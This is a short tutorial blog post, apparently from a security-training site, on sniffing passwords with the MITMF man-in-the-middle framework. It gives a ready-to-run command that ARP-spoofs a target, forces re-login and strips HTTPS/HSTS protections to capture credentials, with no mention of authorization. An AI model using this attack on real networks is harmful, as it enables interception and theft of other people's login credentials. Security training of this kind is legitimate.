MITMF-1: Sniffing Passwords Using Man in the Middle Framework

June 28, 2016 | Views: 56503

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Hello Friends!!

This is my first article for a Man-In-The-Middle Attack series.

In this article, we’ll see how to sniff passwords using a MITMF framework. I use a framework tool for Man-In-The-Middle attacks and you can read more about it here.

 

So, let’s get started…

1. It’s good habit to first read the Man Page or Help Page about any tool or command. To see the MITMF frameworks man page, type in MITMF command without any arguments: mitmf

2. After you’ve gone through all the options available under mitmf framework, lets do some real hacking. Open your Kali Linux terminal and type this command:

mitmf -i wlan0 –gateway 192.168.0.1 –arp –spoof –target 192.168.0.4 -k –hsts

command-image
command explanation:

–i: Is used to define the network interface. In the case above, it’s wlan0.

–gateway: Is used to define the router’s address In the above command, it’s 192.168.0.1

–spoof: Loads plugin Spoof.

–arp: Redirects traffic using ARP spoofing.

–target: Is the victims IP address. In the above command, it’s 192.168.0.4

–k: Kills the current login sessions and forces victim to re-login.

–hsts: Enables SSLstrip+ for partial HSTS bypass.

 

3. Wait for user to login with their credentials and you’ll get their credentials. That’s it.

Sniffed-password

 

Thank you everyone for reading this article. There’s lot more interesting stuff coming in the next articles, because MITMF has endless capabilities. 🙂

Please comment if I’ve made any mistakes and if you’d like to suggest something.

Thank you.

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
42 Comments
Page 5 of 5«12345
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel